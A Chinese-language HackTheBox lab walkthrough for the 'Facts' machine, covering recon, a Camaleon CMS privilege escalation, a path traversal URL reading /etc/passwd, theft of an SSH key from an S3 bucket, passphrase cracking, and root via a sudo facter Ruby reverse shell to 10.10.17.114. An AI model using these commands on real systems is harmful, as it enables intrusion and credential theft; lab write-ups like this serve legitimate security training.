HTB赛季10 - Facts

前言

各位小伙伴,赛季10开启了,但是我最近实在太忙,实在没心情将图片拖进来了,可能会影响大家的阅读体验,但这同时也是锻炼各位的机会哈哈哈。之后空闲下来,会恢复文章品质的。Sorry啦。

复制代码
10.129.18.81

nmap扫描

复制代码
sudo nmap --top-ports 10000 10.129.18.81 --min-rate=1000 -oA ips_quick_TCP_nmapscan && sudo nmap --top-ports 10000 10.129.18.81 --min-rate=1000 -sU -oA ips_quick_UDP_nmapscan && nmap -p- 10.129.18.81 -oA ips_full_TCP_nmapscan --min-rate=1000 && sudo nmap -p- 10.129.18.81 -sU -oA ips_full_UDP_nmapscan --min-rate=1000

![[Pasted image 20260201201638.png]]

扫描vhost

复制代码
ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://facts.htb/ -H 'Host: FUZZ.facts.htb' -mc all -fw 18

ffuf -w test.txt:FUZZ -u http://facts.htb/FUZZ  -mc all -fw 1248

![[Pasted image 20260201203127.png]]

我们进入/admin页面并创建用户

![[Pasted image 20260201203159.png]]

Camaleon CMS - N day 漏洞 - 任意文件读取 & Web账户提权到Admin

成功进入页面

![[Pasted image 20260201203228.png]]

该页面告诉我们了N day漏洞 https://www.tenable.com/security/research/tra-2025-09 ,经过分析我获取了administrator权限,其只要原因是updated_ajax的权限控制存在缺失导致的,会将所有的password里面的内容全部信任。

![[Pasted image 20260201205350.png]]

![[Pasted image 20260201205337.png]]

我们接着发现了一个桶服务器

![[Pasted image 20260201210833.png]]

我们配置aws准备访问

复制代码
aws configure --profile htb

aws s3 ls --profile htb  --endpoint-url http://10.129.18.81:54321

aws s3 cp s3://internal/.ssh/id_ed25519 ./ --profile htb  --endpoint-url http://10.129.18.81:54321

![[Pasted image 20260201210930.png]]

我们提取一下谁使用这个密钥

复制代码
grep -v '\-\-' id_ed25519|base64 -d|strings

可惜没有任何信息,我们去网页搜集所有用户名

复制代码
Bob
Carol
Dave

我们进一步覆盖authorized_keys

复制代码
aws s3 cp ./authorized_keys s3://internal/.ssh/authorized_keys --profile htb  --endpoint-url http://10.129.18.81:54321

aws s3 ls internal/.ssh/ --profile htb  --endpoint-url http://10.129.18.81:54321

aws s3 ls internal --profile htb  --endpoint-url http://10.129.18.81:54321

aws s3 cp s3://randomfacts/* ./ --profile htb  --endpoint-url http://10.129.18.81:54321

aws s3 sync s3://internal ./internal \
  --profile htb \
  --endpoint-url http://10.129.18.81:54321

我们并没有找到用户名字,我们继续查看CMS的漏洞情况,发现存在路径遍历漏洞

![[Pasted image 20260201220217.png]]

复制代码
http://facts.htb/admin/media/download_private_file?file=../../../../../../etc/passwd

我们尝试登录

![[Pasted image 20260201220246.png]]

复制代码
ssh -i id_ed25519 trivia@facts.htb 

![[Pasted image 20260201220324.png]]

我们在云里面曾经写入了authorized_keys文件,所以我们尝试用自己的私钥登录

复制代码
ssh -i ~/.ssh/id_ed25519 trivia@facts.htb 

aws s3 ls internal/.ssh/ --profile htb  --endpoint-url http://10.129.18.81:54321

我们进一步查看,发现云里面的只是复制内容。我们只能破解id_ed25519

复制代码
ssh2john id_ed25519
john hash --wordlist=/home/kali/Desktop/Info/zhuzhuzxia/Passwords/rockyou.txt

![[Pasted image 20260201220959.png]]

复制代码
dragonballz

我们发现,该指令会执行/tmp目录下的第一个rb文件

复制代码
sudo /usr/bin/facter --custom-dir=/tmp/ x

所以我们编写RB文件放在/tmp下即可

复制代码
#!/usr/bin/env ruby

puts "Hello, Ruby"
spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.17.114",80))

然后执行

复制代码
sudo /usr/bin/facter --custom-dir=/tmp/ x
相关推荐
北京耐用通信19 小时前
全域适配工业场景耐达讯自动化Modbus TCP 转 PROFIBUS 网关轻松实现以太网与现场总线互通
网络·人工智能·网络协议·自动化·信息与通信
在角落发呆20 小时前
Linux转发配置:解锁网络互联的核心密码
linux·运维·网络
YMWM_1 天前
UDP协议详解:从原理到Python实践
网络·网络协议·udp
pengyi8710151 天前
共享 IP 与独享 IP 怎么选?被封后升级方案避坑
网络·网络协议·tcp/ip
YuanDaima20481 天前
Linux 进阶运维与 AI 环境实战:进程管理、网络排错与 GPU 监控
linux·运维·服务器·网络·人工智能
凯勒姆1 天前
网工网络设备原理及配置
网络·智能路由器
上海云盾-小余1 天前
网站恶意爬虫拦截策略:智能识别与封禁实操方案
网络·爬虫·安全·web安全
xhbh6661 天前
网关端口映射和路由器端口转发有什么区别?配置要点全解析
运维·服务器·网络·智能路由器·端口映射·映射·无痕网关
半壶清水1 天前
用P4 Tutorial、BMv2 和 Mininet‌解析网络第一集------模拟环境搭建
运维·服务器·网络·网络协议·tcp/ip
2301_780789661 天前
手游遇到攻击为什么要用SDK游戏盾手游遇到攻击为什么要用 SDK 游戏盾?
安全·web安全·游戏·架构·kubernetes·ddos